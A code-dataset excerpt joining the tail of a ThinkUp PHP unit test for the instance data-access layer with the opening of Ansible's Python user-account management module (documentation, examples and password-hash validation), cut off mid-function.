$this->assertEqual($i->network_user_id, $uID[$id]);
$this->assertEqual($i->network_viewer_id, $vID[$id]);
}
}
public function testGetByOwner(){
$data = array(
'id'=>2,
'user_name'=>'steven',
'full_name'=>'Steven Warren',
'email'=>'me@example.com',
'last_login'=>'Yesterday',
'is_admin'=>1,
'is_activated'=>1,
'failed_logins'=>0,
'account_status'=>''
);
$owner = new Owner($data);
// Test is-admin
$result = $this->DAO->getByOwner($owner);
$this->assertIsA($result, "array");
$this->assertEqual(count($result), 5);
$users = array('jill','Paul Clark','Jillian Dickerson','stuart','jack');
$uID = array(12,16,15,13,10);
$vID = array(12,16,15,13,10);
foreach($result as $id=>$i){
$this->assertIsA($i, "Instance");
$this->assertEqual($i->network_username, $users[$id]);
$this->assertEqual($i->network_user_id, $uID[$id]);
$this->assertEqual($i->network_viewer_id, $vID[$id]);
}
// Test Is Admin - Forced Not
$result = $this->DAO->getByOwner($owner, true);
$this->assertIsA($result, "array");
$this->assertEqual(count($result), 2);
$users = array('jill','jack');
$uID = array(12,10);
$vID = array(12,10);
foreach($result as $id=>$i){
$this->assertIsA($i, "Instance");
$this->assertEqual($i->network_username, $users[$id]);
$this->assertEqual($i->network_user_id, $uID[$id]);
$this->assertEqual($i->network_viewer_id, $vID[$id]);
}
// Test not admin
$owner->is_admin = false;
$result = $this->DAO->getByOwner($owner);
$this->assertIsA($result, "array");
$this->assertEqual(count($result), 2);
$users = array('jill','jack');
$uID = array(12,10);
$vID = array(12,10);
foreach($result as $id=>$i){
$this->assertIsA($i, "Instance");
$this->assertEqual($i->network_username, $users[$id]);
$this->assertEqual($i->network_user_id, $uID[$id]);
$this->assertEqual($i->network_viewer_id, $vID[$id]);
}
$owner->id = 3;
//Try empty
$result = $this->DAO->getByOwner($owner);
$this->assertIsA($result, "array");
$this->assertEqual(count($result), 0);
}
public function testGetByOwnerWithStatus(){
$data = array(
'id'=>2,
'user_name'=>'steven',
'full_name'=>'Steven Warren',
'email'=>'me@example.com',
'last_login'=>'Yesterday',
'is_admin'=>1,
'is_activated'=>1,
'failed_logins'=>0,
'account_status'=>''
);
$owner = new Owner($data);
$result = $this->DAO->getByOwnerWithStatus($owner);
$this->assertIsA($result, "array");
$this->assertEqual(count($result), 2);
$users = array('jack','jill');
$user_ids = array(10, 12);
foreach($result as $id=>$i){
$this->assertIsA($i, "Instance");
$this->assertEqual($i->network_username, $users[$id]);
$this->assertEqual($i->network_user_id, $user_ids[$id]);
if ($i->network_user_id == 10) {
$this->assertEqual($i->auth_error, 'There has been an error.');
} else {
$this->assertEqual($i->auth_error, '');
}
}
}
public function testGetByOwnerAndNetwork(){
$data = array(
'id'=>2,
'user_name'=>'steven',
'full_name'=>'Steven Warren',
'email'=>'me@example.com',
'last_login'=>'Yesterday',
'is_admin'=>1,
'is_activated'=>1,
'failed_logins'=>0,
'account_status'=>''
);
$owner = new Owner($data);
// Test is-admin twitter
$result = $this->DAO->getByOwnerAndNetwork($owner, 'twitter');
$this->assertIsA($result, "array");
$this->assertEqual(count($result), 3);
$users = array('jill','stuart','jack');
$uID = array(12,13,10);
$vID = array(12,13,10);
foreach($result as $id=>$i){
$this->assertIsA($i, "Instance");
$this->assertEqual($i->network_username, $users[$id]);
$this->assertEqual($i->network_user_id, $uID[$id]);
$this->assertEqual($i->network_viewer_id, $vID[$id]);
}
// Test is-admin twitter, active only
$result = $this->DAO->getByOwnerAndNetwork($owner, 'twitter', true, true);
$this->assertIsA($result, "array");
$this->assertEqual(count($result), 2); //jill and jack active, stuart is not
$users = array('jill','jack');
$uID = array(12,10);
$vID = array(12,10);
foreach($result as $id=>$i){
$this->assertIsA($i, "Instance");
$this->assertEqual($i->network_username, $users[$id]);
$this->assertEqual($i->network_user_id, $uID[$id]);
$this->assertEqual($i->network_viewer_id, $vID[$id]);
}
// Test is-admin facebook
$result = $this->DAO->getByOwnerAndNetwork($owner, 'facebook');
$this->assertIsA($result, "array");
$this->assertEqual(count($result), 2);
$users = array('Paul Clark','Jillian Dickerson');
$uID = array(16,15);
$vID = array(16,15);
foreach($result as $id=>$i){
$this->assertIsA($i, "Instance");
$this->assertEqual($i->network_username, $users[$id]);
$this->assertEqual($i->network_user_id, $uID[$id]);
$this->assertEqual($i->network_viewer_id, $vID[$id]);
}
// Test is-admin Twitter, forced not
$result = $this->DAO->getByOwnerAndNetwork($owner, 'twitter', true);
$this->assertIsA($result, "array");
$this->assertEqual(count($result), 2);
$users = array('jill','jack');
$uID = array(12,10);
$vID = array(12,10);
foreach($result as $id=>$i){
$this->assertIsA($i, "Instance");
$this->assertEqual($i->network_username, $users[$id]);
$this->assertEqual($i->network_user_id, $uID[$id]);
$this->assertEqual($i->network_viewer_id, $vID[$id]);
}
// Test not admin twitter
$owner->is_admin = false;
$result = $this->DAO->getByOwnerAndNetwork($owner, 'twitter');
$this->assertIsA($result, "array");
$this->assertEqual(count($result), 2);
$users = array('jill','jack');
$uID = array(12,10);
$vID = array(12,10);
foreach($result as $id=>$i){
$this->assertIsA($i, "Instance");
$this->assertEqual($i->network_username, $users[$id]);
$this->assertEqual($i->network_user_id, $uID[$id]);
$this->assertEqual($i->network_viewer_id, $vID[$id]);
}
$owner->id = 3;
//Try empty
$result = $this->DAO->getByOwnerAndNetwork($owner, 'twitter');;
$this->assertIsA($result, "array");
$this->assertEqual(count($result), 0);
}
public function testSetPublic(){
$result = $this->DAO->setPublic(1, true);
$this->assertEqual($result, 1, "Count UpdateToTrue (%s)");
//Testing if it really works
$result = $this->DAO->getByUsername('jack');
$this->assertEqual($result->network_username, 'jack');
$this->assertEqual($result->network_user_id, 10);
$this->assertTrue($result->is_public);
$result = $this->DAO->setPublic(1, false);
$this->assertEqual($result, 1, "Count UpdateToFalse (%s)");
//Testing if it really works
$result = $this->DAO->getByUsername('jack');
$this->assertEqual($result->network_username, 'jack');
$this->assertEqual($result->network_user_id, 10);
$this->assertFalse($result->is_public);
}
public function testSetActive(){
$result = $this->DAO->setActive(1, false);
$this->assertEqual($result, 1, "Count UpdateToFalse (%s)");
//Testing if it really works
$result = $this->DAO->getByUsername('jack');
$this->assertEqual($result->network_username, 'jack');
$this->assertEqual($result->network_user_id, 10);
$this->assertFalse($result->is_active);
$result = $this->DAO->setActive(1, true);
$this->assertEqual($result, 1, "Count UpdateToTrue (%s)");
//Testing if it really works
$result = $this->DAO->getByUsername('jack');
$this->assertEqual($result->network_username, 'jack');
$this->assertEqual($result->network_user_id, 10);
$this->assertTrue($result->is_active);
}
public function testSave(){
//First we need to generate some more TestData(tm)
//First in line is some posts 250 Randomly generated ones, some with mentions.
$mentions = 0;
$posts = 0;
$replies = 0;
$links = 0;
$builders = array();
for($i=0; $i <= 250; $i++){
$sender = rand(5,16);
$data = 'asdf qwerty flakes meep';
$post_id = rand(1000, 1000000);
while(isset($pic[$post_id])){
$post_id = rand(1000, 1000000);
}
$pic[$post_id] = true;
$number = rand(1,8);
if ($number == 1 or $number == 2){
$data = "@jack ".$data;
$mentions++;
}
elseif ($number == 3){
$data = "@jill ".$data;
}
if ($number % 2 == 0) {
$reply_to = '11';
if ($sender == 10){
$replies++;
}
} else {
$reply_to = 'NULL';
}
$builders[] = FixtureBuilder::build('posts', array('id'=>$post_id, 'post_id'=>$post_id,
'author_user_id'=>$sender, 'post_text'=>$data, 'pub_date'=>'-'.$number.'h',
'in_reply_to_user_id'=>$reply_to));
if ($sender == 10){
$posts++;
}
if ($number % 2 == 1) {
$builders[] = FixtureBuilder::build('links', array('url'=>$data, 'post_key'=>$post_id));
if ($sender == 10){
$links++;
}
}
}
unset($pic);
//Then generate some follows
$follows = 0;
for($i=0; $i<= 150; $i++){
$follow = array("follower"=>rand(5,25), "following"=>rand(5,25));
if (!isset($fd[$follow['following']."-".$follow['follower']])){
$fd[$follow['following']."-".$follow['follower']] = true;
$builders[] = FixtureBuilder::build('follows', array('user_id'=>$follow['following'],
'follower_id'=>$follow['follower']));
if ($follow['following'] == 10){
$follows++;
}
}
else{
$i = $i-1;
}
}
//Lastly generate some users
$users = array(
array('id'=>10, 'user_name'=>'jack'),
array('id'=>12, 'user_name'=>'jill'),
array('id'=>13, 'user_name'=>'stuart'),
array('id'=>15, 'user_name'=>'Jillian Dickerson'),
array('id'=>16, 'user_name'=>'Paul Clark')
);
foreach($users as $user){
$builders[] = FixtureBuilder::build('users', $user);
}
//Now load the instance in question
$i = $this->DAO->getByUsername('jack');
//Edit it.
$i->last_post_id = 512;
$i->is_archive_loaded_follows = 1;
$i->is_archive_loaded_replies = 1;
//First make sure that last run data is correct before we start.
$result = $this->DAO->getInstanceFreshestOne();
$this->assertIsA($result, "Instance");
$this->assertEqual($result->network_username, 'jill');
$this->assertEqual($result->network_user_id, 12);
$this->assertEqual($result->network_viewer_id, 12);
//Save it
$count = $this->DAO->save($i, 1024);
$this->assertEqual($count, 1);
//Load it for testing
$result = $this->DAO->getByUsername('jack');
$this->assertEqual($result->total_posts_by_owner, 1024);
$this->assertEqual($result->last_post_id, 512);
$this->assertNull($result->total_replies_in_system);
$this->assertEqual($result->total_follows_in_system, $follows);
$this->assertEqual($result->total_posts_in_system, $posts);
$this->assertTrue($result->is_archive_loaded_follows);
$this->assertTrue($result->is_archive_loaded_replies);
//Check if it is the update updated last Run.
$result = $this->DAO->getInstanceFreshestOne();
$this->assertIsA($result, "Instance");
$this->assertEqual($result->network_username, 'jack');
$this->assertEqual($result->network_user_id, 10);
$this->assertEqual($result->network_viewer_id, 10);
// Check if the stats were correctly calculated and saved
// post per are limited to a max of 25, see getInstanceUserStats()
$posts_per = ($posts > 25) ? 25 : $posts;
// $this->assertEqual(round($result->posts_per_day), $posts_per);
$this->assertEqual($result->posts_per_week, $posts_per);
$this->assertEqual($result->percentage_replies, round($replies / $posts * 100, 2));
$this->assertEqual($result->percentage_links, round($links / $posts * 100, 2));
//Still needs tests for:
//earliest_reply_in_system
//earliest_post_in_system
}
public function testSaveNoPosts(){
$builders = array();
$builders[] = FixtureBuilder::build('users', array('id'=>10, 'user_name'=>'jack'));
//Load the instance
$instance = $this->DAO->getByUsername('jack');
// This will make the test fail if PHP warnings are generated when an instance has no posts
$this->DAO->save($instance, 1024);
}
public function testUpdateLastRun(){
//First make sure that the data is correct before we start.
$result = $this->DAO->getInstanceFreshestOne();
$this->assertIsA($result, "Instance");
$this->assertEqual($result->network_username, 'jill');
$this->assertEqual($result->network_user_id, 12);
$this->assertEqual($result->network_viewer_id, 12);
//preform the update, and check the result.
$result = $this->DAO->updateLastRun(1);
$this->assertEqual($result, 1);
//Check if it is the update.
$result = $this->DAO->getInstanceFreshestOne();
$this->assertIsA($result, "Instance");
$this->assertEqual($result->network_username, 'jack');
$this->assertEqual($result->network_user_id, 10);
$this->assertEqual($result->network_viewer_id, 10);
}
public function testIsUserConfigured(){
// Test user that is Configured
$result = $this->DAO->isUserConfigured("jack", "twitter");
$this->assertTrue($result);
// Test non-existing user
$result = $this->DAO->isUserConfigured("no one", "facebook");
$this->assertFalse($result);
}
public function testIsInstancePublic(){
// Test private instance
$result = $this->DAO->isInstancePublic("jack", "twitter");
$this->assertFalse($result);
// Test public instance
$result = $this->DAO->isInstancePublic("stuart", "twitter");
$this->assertTrue($result);
// Test non-existent instance
$result = $this->DAO->isInstancePublic("no one", "facebook");
$this->assertFalse($result);
}
public function testGetByUserAndViewerId() {
$this->DAO = new InstanceMySQLDAO();
$builders[] = FixtureBuilder::build('instances', array('network_user_id'=>17,
'network_username'=>'Jillian Micheals', 'network'=>'facebook', 'network_viewer_id'=>15,
'crawler_last_run'=>'2010-01-01 12:00:01', 'is_active'=>1));
$result = $this->DAO->getByUserAndViewerId(10, 10, 'twitter');
$this->assertEqual($result->network_username, 'jack');
$result = $this->DAO->getByUserAndViewerId(17, 15, 'facebook');
$this->assertEqual($result->network_username, 'Jillian Micheals');
}
public function testGetByViewerId() {
$this->DAO = new InstanceMySQLDAO();
$builders[] = FixtureBuilder::build('instances', array('network_user_id'=>17,
'network_username'=>'Jillian Micheals', 'network'=>'facebook', 'network_viewer_id'=>15,
'crawler_last_run'=>'2010-01-01 12:00:01', 'is_active'=>1));
$result = $this->DAO->getByViewerId(15);
$this->assertEqual($result[0]->network_username, 'Jillian Dickerson');
$this->assertEqual($result[1]->network_username, 'Jillian Micheals');
}
public function testGetByUsernameOnNetwork() {
$this->DAO = new InstanceMySQLDAO();
$builders[] = FixtureBuilder::build('instances', array('network_user_id'=>17,
'network_username'=>'salma', 'network'=>'facebook', 'network_viewer_id'=>15,
'crawler_last_run'=>'2010-01-01 12:00:01', 'is_active'=>1));
$builders[] = FixtureBuilder::build('instances', array('network_user_id'=>18,
'network_username'=>'salma', 'network'=>'facebook page', 'network_viewer_id'=>15,
'crawler_last_run'=>'2010-01-01 12:00:01', 'is_active'=>1));
$result = $this->DAO->getByUsernameOnNetwork('salma', 'facebook');
$this->assertEqual($result->network_username, 'salma');
$this->assertEqual($result->network, 'facebook');
$this->assertEqual($result->network_user_id, 17);
$result = $this->DAO->getByUsernameOnNetwork('salma', 'facebook page');
$this->assertEqual($result->network_username, 'salma');
$this->assertEqual($result->network, 'facebook page');
$this->assertEqual($result->network_user_id, 18);
}
public function testGetInstanceFreshestPublicOne() {
$builders[] = FixtureBuilder::build('instances', array('network_user_id'=>'501',
'network_username'=>'mememe', 'is_public'=>'1', 'is_activated'=>'1', 'crawler_last_run'=>'-1h'));
//try one
$result = $this->DAO->getInstanceFreshestPublicOne();
$this->assertIsA($result, "Instance");
$this->assertEqual($result->network_username, 'mememe');
$this->assertEqual($result->network_user_id, 501);
$builders[] = FixtureBuilder::build('instances', array('network_user_id'=>'502',
'network_username'=>'mememetoo', 'is_public'=>'1', 'is_activated'=>'1', 'crawler_last_run'=>'-30m'));
//try one
$result = $this->DAO->getInstanceFreshestPublicOne();
$this->assertIsA($result, "Instance");
$this->assertEqual($result->network_username, 'mememetoo');
$this->assertEqual($result->network_user_id, 502);
}
public function testGetPublicInstances() {
$result = $this->DAO->getPublicInstances();
$this->assertIsA($result, "Array");
$this->assertEqual(sizeof($result), 1);
$this->assertIsA($result[0], "Instance");
$this->assertEqual($result[0]->network_username, "Jillian Dickerson" );
}
public function testUpdateInstanceUsername() {
$this->DAO = new InstanceMySQLDAO();
$builders[] = FixtureBuilder::build('instances', array('network_user_id'=>17,
'network_username'=>'johndoe', 'network'=>'twitter', 'network_viewer_id'=>15,
'crawler_last_run'=>'2010-01-01 12:00:01', 'is_active'=>1));
$instance = $this->DAO->getByUsername('johndoe');
$update_cnt = $this->DAO->updateUsername($instance->id, 'johndoe2');
$this->assertEqual(1, $update_cnt);
$instance = $this->DAO->getByUsername('johndoe');
$this->assertNull($instance);
$instance = $this->DAO->getByUsername('johndoe2');
$this->assertEqual($instance->network_username, "johndoe2" );
}
public function testGetActiveInstancesStalestFirstForOwnerByNetworkNoAuthError() {
$this->builders[] = FixtureBuilder::build('instances', array('network_user_id'=>17, 'network_username'=>'yaya',
'network'=>'twitter', 'network_viewer_id'=>17, 'crawler_last_run'=>'2010-01-21 12:00:00', 'is_active'=>1,
'is_public'=>0));
$this->builders[] = FixtureBuilder::build('owner_instances', array('owner_id'=>3, 'instance_id'=>6,
'auth_error'=>''));
$this->DAO = new InstanceMySQLDAO();
$owner = new Owner();
$owner->id = 2;
//Owner isn't an admin
$owner->is_admin = false;
//Should only return 1 result
$result = $this->DAO->getActiveInstancesStalestFirstForOwnerByNetworkNoAuthError($owner, 'twitter');
$this->assertEqual(sizeof($result), 1);
$this->assertEqual($result[0]->id, 2);
$this->assertEqual($result[0]->network_username, "jill");
//Owner is an admin
$owner->is_admin = true;
//Should return 2 results
$result = $this->DAO->getActiveInstancesStalestFirstForOwnerByNetworkNoAuthError($owner, 'twitter');
$this->assertEqual(sizeof($result), 2);
$this->assertEqual($result[0]->id, 2);
$this->assertEqual($result[0]->network_username, "jill");
$this->assertEqual($result[1]->id, 6);
$this->assertEqual($result[1]->network_username, "yaya");
}
public function testSetPostArchiveLoaded() {
$builders[] = FixtureBuilder::build('instances', array('network_user_id'=>17,
'network_username'=>'johndoe', 'network'=>'twitter', 'network_viewer_id'=>15,
'crawler_last_run'=>'2010-01-01 12:00:01', 'is_active'=>1, 'is_archive_loaded_posts'=>0));
$this->DAO->setPostArchiveLoaded(17, 'twitter');
$result = $this->DAO->getByUsername('johndoe');
$this->assertTrue($result->is_archive_loaded_posts);
}
}
| ddanuj/ThinkUp | tests/TestOfInstanceMySQLDAO.php | PHP | gpl-3.0 | 35,194 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2012, Stephen Fromm <sfromm@gmail.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = r'''
module: user
version_added: "0.2"
short_description: Manage user accounts
description:
- Manage user accounts and user attributes.
- For Windows targets, use the M(win_user) module instead.
options:
name:
description:
- Name of the user to create, remove or modify.
type: str
required: true
aliases: [ user ]
uid:
description:
- Optionally sets the I(UID) of the user.
type: int
comment:
description:
- Optionally sets the description (aka I(GECOS)) of user account.
type: str
hidden:
description:
- macOS only, optionally hide the user from the login window and system preferences.
- The default will be C(yes) if the I(system) option is used.
type: bool
version_added: "2.6"
non_unique:
description:
- Optionally when used with the -u option, this option allows to change the user ID to a non-unique value.
type: bool
default: no
version_added: "1.1"
seuser:
description:
- Optionally sets the seuser type (user_u) on selinux enabled systems.
type: str
version_added: "2.1"
group:
description:
- Optionally sets the user's primary group (takes a group name).
type: str
groups:
description:
- List of groups user will be added to. When set to an empty string C(''),
C(null), or C(~), the user is removed from all groups except the
primary group. (C(~) means C(null) in YAML)
- Before Ansible 2.3, the only input format allowed was a comma separated string.
type: list
append:
description:
- If C(yes), add the user to the groups specified in C(groups).
- If C(no), user will only be added to the groups specified in C(groups),
removing them from all other groups.
type: bool
default: no
shell:
description:
- Optionally set the user's shell.
- On macOS, before Ansible 2.5, the default shell for non-system users was C(/usr/bin/false).
Since Ansible 2.5, the default shell for non-system users on macOS is C(/bin/bash).
- On other operating systems, the default shell is determined by the underlying tool being
used. See Notes for details.
type: str
home:
description:
- Optionally set the user's home directory.
type: path
skeleton:
description:
- Optionally set a home skeleton directory.
- Requires C(create_home) option!
type: str
version_added: "2.0"
password:
description:
- Optionally set the user's password to this crypted value.
- On macOS systems, this value has to be cleartext. Beware of security issues.
- To create a disabled account on Linux systems, set this to C('!') or C('*').
- See U(https://docs.ansible.com/ansible/faq.html#how-do-i-generate-crypted-passwords-for-the-user-module)
for details on various ways to generate these password values.
type: str
state:
description:
- Whether the account should exist or not, taking action if the state is different from what is stated.
type: str
choices: [ absent, present ]
default: present
create_home:
description:
- Unless set to C(no), a home directory will be made for the user
when the account is created or if the home directory does not exist.
- Changed from C(createhome) to C(create_home) in Ansible 2.5.
type: bool
default: yes
aliases: [ createhome ]
move_home:
description:
- "If set to C(yes) when used with C(home: ), attempt to move the user's old home
directory to the specified directory if it isn't there already and the old home exists."
type: bool
default: no
system:
description:
- When creating an account C(state=present), setting this to C(yes) makes the user a system account.
- This setting cannot be changed on existing users.
type: bool
default: no
force:
description:
- This only affects C(state=absent), it forces removal of the user and associated directories on supported platforms.
- The behavior is the same as C(userdel --force), check the man page for C(userdel) on your system for details and support.
- When used with C(generate_ssh_key=yes) this forces an existing key to be overwritten.
type: bool
default: no
remove:
description:
- This only affects C(state=absent), it attempts to remove directories associated with the user.
- The behavior is the same as C(userdel --remove), check the man page for details and support.
type: bool
default: no
login_class:
description:
- Optionally sets the user's login class, a feature of most BSD OSs.
type: str
generate_ssh_key:
description:
- Whether to generate a SSH key for the user in question.
- This will B(not) overwrite an existing SSH key unless used with C(force=yes).
type: bool
default: no
version_added: "0.9"
ssh_key_bits:
description:
- Optionally specify number of bits in SSH key to create.
type: int
default: default set by ssh-keygen
version_added: "0.9"
ssh_key_type:
description:
- Optionally specify the type of SSH key to generate.
- Available SSH key types will depend on implementation
present on target host.
type: str
default: rsa
version_added: "0.9"
ssh_key_file:
description:
- Optionally specify the SSH key filename.
- If this is a relative filename then it will be relative to the user's home directory.
- This parameter defaults to I(.ssh/id_rsa).
type: path
version_added: "0.9"
ssh_key_comment:
description:
- Optionally define the comment for the SSH key.
type: str
default: ansible-generated on $HOSTNAME
version_added: "0.9"
ssh_key_passphrase:
description:
- Set a passphrase for the SSH key.
- If no passphrase is provided, the SSH key will default to having no passphrase.
type: str
version_added: "0.9"
update_password:
description:
- C(always) will update passwords if they differ.
- C(on_create) will only set the password for newly created users.
type: str
choices: [ always, on_create ]
default: always
version_added: "1.3"
expires:
description:
- An expiry time for the user in epoch, it will be ignored on platforms that do not support this.
- Currently supported on GNU/Linux, FreeBSD, and DragonFlyBSD.
- Since Ansible 2.6 you can remove the expiry time specify a negative value.
Currently supported on GNU/Linux and FreeBSD.
type: float
version_added: "1.9"
password_lock:
description:
- Lock the password (usermod -L, pw lock, usermod -C).
- BUT implementation differs on different platforms, this option does not always mean the user cannot login via other methods.
- This option does not disable the user, only lock the password. Do not change the password in the same task.
- Currently supported on Linux, FreeBSD, DragonFlyBSD, NetBSD, OpenBSD.
type: bool
version_added: "2.6"
local:
description:
- Forces the use of "local" command alternatives on platforms that implement it.
- This is useful in environments that use centralized authentification when you want to manipulate the local users
(i.e. it uses C(luseradd) instead of C(useradd)).
- This requires that these commands exist on the targeted host, otherwise it will be a fatal error.
type: bool
default: no
version_added: "2.4"
profile:
description:
- Sets the profile of the user.
- Does nothing when used with other platforms.
- Can set multiple profiles using comma separation.
- To delete all the profiles, use C(profile='').
- Currently supported on Illumos/Solaris.
type: str
version_added: "2.8"
authorization:
description:
- Sets the authorization of the user.
- Does nothing when used with other platforms.
- Can set multiple authorizations using comma separation.
- To delete all authorizations, use C(authorization='').
- Currently supported on Illumos/Solaris.
type: str
version_added: "2.8"
role:
description:
- Sets the role of the user.
- Does nothing when used with other platforms.
- Can set multiple roles using comma separation.
- To delete all roles, use C(role='').
- Currently supported on Illumos/Solaris.
type: str
version_added: "2.8"
notes:
- There are specific requirements per platform on user management utilities. However
they generally come pre-installed with the system and Ansible will require they
are present at runtime. If they are not, a descriptive error message will be shown.
- On SunOS platforms, the shadow file is backed up automatically since this module edits it directly.
On other platforms, the shadow file is backed up by the underlying tools used by this module.
- On macOS, this module uses C(dscl) to create, modify, and delete accounts. C(dseditgroup) is used to
modify group membership. Accounts are hidden from the login window by modifying
C(/Library/Preferences/com.apple.loginwindow.plist).
- On FreeBSD, this module uses C(pw useradd) and C(chpass) to create, C(pw usermod) and C(chpass) to modify,
C(pw userdel) remove, C(pw lock) to lock, and C(pw unlock) to unlock accounts.
- On all other platforms, this module uses C(useradd) to create, C(usermod) to modify, and
C(userdel) to remove accounts.
seealso:
- module: authorized_key
- module: group
- module: win_user
author:
- Stephen Fromm (@sfromm)
'''
EXAMPLES = r'''
- name: Add the user 'johnd' with a specific uid and a primary group of 'admin'
user:
name: johnd
comment: John Doe
uid: 1040
group: admin
- name: Add the user 'james' with a bash shell, appending the group 'admins' and 'developers' to the user's groups
user:
name: james
shell: /bin/bash
groups: admins,developers
append: yes
- name: Remove the user 'johnd'
user:
name: johnd
state: absent
remove: yes
- name: Create a 2048-bit SSH key for user jsmith in ~jsmith/.ssh/id_rsa
user:
name: jsmith
generate_ssh_key: yes
ssh_key_bits: 2048
ssh_key_file: .ssh/id_rsa
- name: Added a consultant whose account you want to expire
user:
name: james18
shell: /bin/zsh
groups: developers
expires: 1422403387
- name: Starting at Ansible 2.6, modify user, remove expiry time
user:
name: james18
expires: -1
'''
RETURN = r'''
append:
description: Whether or not to append the user to groups
returned: When state is 'present' and the user exists
type: bool
sample: True
comment:
description: Comment section from passwd file, usually the user name
returned: When user exists
type: str
sample: Agent Smith
create_home:
description: Whether or not to create the home directory
returned: When user does not exist and not check mode
type: bool
sample: True
force:
description: Whether or not a user account was forcibly deleted
returned: When state is 'absent' and user exists
type: bool
sample: False
group:
description: Primary user group ID
returned: When user exists
type: int
sample: 1001
groups:
description: List of groups of which the user is a member
returned: When C(groups) is not empty and C(state) is 'present'
type: str
sample: 'chrony,apache'
home:
description: "Path to user's home directory"
returned: When C(state) is 'present'
type: str
sample: '/home/asmith'
move_home:
description: Whether or not to move an existing home directory
returned: When C(state) is 'present' and user exists
type: bool
sample: False
name:
description: User account name
returned: always
type: str
sample: asmith
password:
description: Masked value of the password
returned: When C(state) is 'present' and C(password) is not empty
type: str
sample: 'NOT_LOGGING_PASSWORD'
remove:
description: Whether or not to remove the user account
returned: When C(state) is 'absent' and user exists
type: bool
sample: True
shell:
description: User login shell
returned: When C(state) is 'present'
type: str
sample: '/bin/bash'
ssh_fingerprint:
description: Fingerprint of generated SSH key
returned: When C(generate_ssh_key) is C(True)
type: str
sample: '2048 SHA256:aYNHYcyVm87Igh0IMEDMbvW0QDlRQfE0aJugp684ko8 ansible-generated on host (RSA)'
ssh_key_file:
description: Path to generated SSH public key file
returned: When C(generate_ssh_key) is C(True)
type: str
sample: /home/asmith/.ssh/id_rsa
ssh_public_key:
description: Generated SSH public key file
returned: When C(generate_ssh_key) is C(True)
type: str
sample: >
'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC95opt4SPEC06tOYsJQJIuN23BbLMGmYo8ysVZQc4h2DZE9ugbjWWGS1/pweUGjVstgzMkBEeBCByaEf/RJKNecKRPeGd2Bw9DCj/bn5Z6rGfNENKBmo
618mUJBvdlEgea96QGjOwSB7/gmonduC7gsWDMNcOdSE3wJMTim4lddiBx4RgC9yXsJ6Tkz9BHD73MXPpT5ETnse+A3fw3IGVSjaueVnlUyUmOBf7fzmZbhlFVXf2Zi2rFTXqvbdGHKkzpw1U8eB8xFPP7y
d5u1u0e6Acju/8aZ/l17IDFiLke5IzlqIMRTEbDwLNeO84YQKWTm9fODHzhYe0yvxqLiK07 ansible-generated on host'
stderr:
description: Standard error from running commands
returned: When stderr is returned by a command that is run
type: str
sample: Group wheels does not exist
stdout:
description: Standard output from running commands
returned: When standard output is returned by the command that is run
type: str
sample:
system:
description: Whether or not the account is a system account
returned: When C(system) is passed to the module and the account does not exist
type: bool
sample: True
uid:
description: User ID of the user account
returned: When C(UID) is passed to the module
type: int
sample: 1044
'''
import errno
import grp
import calendar
import os
import re
import pty
import pwd
import select
import shutil
import socket
import subprocess
import time
from ansible.module_utils import distro
from ansible.module_utils._text import to_native, to_bytes, to_text
from ansible.module_utils.basic import load_platform_subclass, AnsibleModule
try:
import spwd
HAVE_SPWD = True
except ImportError:
HAVE_SPWD = False
_HASH_RE = re.compile(r'[^a-zA-Z0-9./=]')
class User(object):
"""
This is a generic User manipulation class that is subclassed
based on platform.
A subclass may wish to override the following action methods:-
- create_user()
- remove_user()
- modify_user()
- ssh_key_gen()
- ssh_key_fingerprint()
- user_exists()
All subclasses MUST define platform and distribution (which may be None).
"""
platform = 'Generic'
distribution = None
SHADOWFILE = '/etc/shadow'
SHADOWFILE_EXPIRE_INDEX = 7
LOGIN_DEFS = '/etc/login.defs'
DATE_FORMAT = '%Y-%m-%d'
def __new__(cls, *args, **kwargs):
return load_platform_subclass(User, args, kwargs)
def __init__(self, module):
self.module = module
self.state = module.params['state']
self.name = module.params['name']
self.uid = module.params['uid']
self.hidden = module.params['hidden']
self.non_unique = module.params['non_unique']
self.seuser = module.params['seuser']
self.group = module.params['group']
self.comment = module.params['comment']
self.shell = module.params['shell']
self.password = module.params['password']
self.force = module.params['force']
self.remove = module.params['remove']
self.create_home = module.params['create_home']
self.move_home = module.params['move_home']
self.skeleton = module.params['skeleton']
self.system = module.params['system']
self.login_class = module.params['login_class']
self.append = module.params['append']
self.sshkeygen = module.params['generate_ssh_key']
self.ssh_bits = module.params['ssh_key_bits']
self.ssh_type = module.params['ssh_key_type']
self.ssh_comment = module.params['ssh_key_comment']
self.ssh_passphrase = module.params['ssh_key_passphrase']
self.update_password = module.params['update_password']
self.home = module.params['home']
self.expires = None
self.password_lock = module.params['password_lock']
self.groups = None
self.local = module.params['local']
self.profile = module.params['profile']
self.authorization = module.params['authorization']
self.role = module.params['role']
if module.params['groups'] is not None:
self.groups = ','.join(module.params['groups'])
if module.params['expires'] is not None:
try:
self.expires = time.gmtime(module.params['expires'])
except Exception as e:
module.fail_json(msg="Invalid value for 'expires' %s: %s" % (self.expires, to_native(e)))
if module.params['ssh_key_file'] is not None:
self.ssh_file = module.params['ssh_key_file']
else:
self.ssh_file = os.path.join('.ssh', 'id_%s' % self.ssh_type)
def check_password_encrypted(self):
# Darwin needs cleartext password, so skip validation
if self.module.params['password'] and self.platform != 'Darwin':
maybe_invalid = False
# Allow setting the password to * or ! in order to disable the account
if self.module.params['password'] in set(['*', '!']):
maybe_invalid = False
else:
# : for delimiter, * for disable user, ! for lock user
# these characters are invalid in the password
if any(char in self.module.params['password'] for char in ':*!'):
maybe_invalid = True
if '$' not in self.module.params['password']:
maybe_invalid = True
else:
fields = self.module.params['password'].split("$")
if len(fields) >= 3:
# contains character outside the crypto constraint
if bool(_HASH_RE.search(fields[-1])):
maybe_invalid = True
# md5
if fields[1] == '1' and len(fields[-1]) != 22:
maybe_invalid = True
# sha256
if fields[1] == '5' and len(fields[-1]) != 43:
maybe_invalid = True
# sha512
if fields[1] == '6' and len(fields[-1]) != 86:
maybe_invalid = True
else:
maybe_invalid = True
if maybe_invalid:
self.module.warn("The input password appears not to have been hashed. "
"The 'password' argument must be encrypted for this module to work properly.")
def execute_command(self, cmd, use_unsafe_shell=False, data=None, obey_checkmode=True):
if self.module.check_mode and obey_checkmode:
